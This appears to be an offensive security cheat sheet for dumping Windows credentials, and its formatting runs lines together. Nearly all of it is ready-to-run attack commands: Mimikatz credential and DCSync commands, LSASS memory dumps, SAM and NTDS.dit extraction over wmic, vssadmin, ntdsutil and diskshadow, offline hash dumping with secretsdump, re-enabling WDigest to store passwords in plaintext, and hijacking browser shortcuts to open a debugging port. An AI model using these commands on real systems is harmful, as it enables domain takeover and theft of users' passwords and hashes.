#Mimikatz
In most cases you must be NT\System to dump credentials. Especially if accessing the LSASS process.
privilege::debuglsadump::samlsadump::lsasekurlsa::logonpasswordssekurlsa::msvsekurlsa::kerberossekurlsa::minidump lsass.dmp
sekurlsa::logonpasswordsNo LSASS interaction required. Relies on replication permissions.
lsadump::dcsync /domain:corp.local /user:krbtgtsekurlsa::dpapidpapi::chrome#Windows Based Access and Dumps
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp fullSAM
reg save HKLM\SAM sam.saveSystem
reg save HKLM\SYSTEM system.saveCombine using samdump2
samdump2 system samesentutl is a Windows LoLBin
esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\samreg save HKLM\SYSTEM system & reg save HKLM\security securitycombine in mimikatz ran in remote machine
lsadump::secrets /system:c:\temp\system /security:c:\temp\securityCreate a shadow copy of C
wmic /node:dc01 /user:administrator@domain /password:123456 process call create "cmd /c vssadmin create shadow /for=C: 2>&1"Copy NTDS.dit SYSTEM and SECRURITY to C:\temp
wmic /node:dc01 /user:administrator@domain /password:123456 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\temp\"Mount the shadow copy locally to retrieve the files
net use j: \\dc01\c$\temp /user:administrator 123456; dir j:\ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q qdump hashes offline with impacket
secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit localOn DCs Windows server version 2008+ we can use diskshadow to grab the ntdis.dit
first we must create a diskshadow script to create a new copy of C:\ or where ever ntds.dit is located and expose it to a new drive
set context persistent nowriters
set metadata c:\exfil\metadata.cab
add volume c: alias trophy
create
expose %someAlias% z:Then we excuse it
mkdir c:\exfil
diskshadow.exe /s C:\users\Administrator\Desktop\shadow.txt
cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.ditimpacket-secretsdump -just-dc-ntlm domain/administrator@10.10.13.37Search Hive Key Local Machine for password
reg query HKLM /f password /t REG_SZ /sSearch Hive Key Current User for password
reg query HKCU /f password /t REG_SZ /sWDigest is a Security Support Provider within LSASS that stores crednetials in plain text. After Win8, by default WDigest is turned off on systems.
The registry still exists though and we can turn it on to force the credential store to be used again.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1Once turned on the next logon authentcation will begin populating the store
#Browser Based Access and Dumps
This attack requires that you already have access to the host through a c2 system.
First you must poison the shortcut to make either Chrome or Edge start with a debugger port.
Normally this can be accomplished by changing the target to "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222
If the browser is already running you can force a crash or wait until a new instance is started
Now import a script like SilentFrame or similar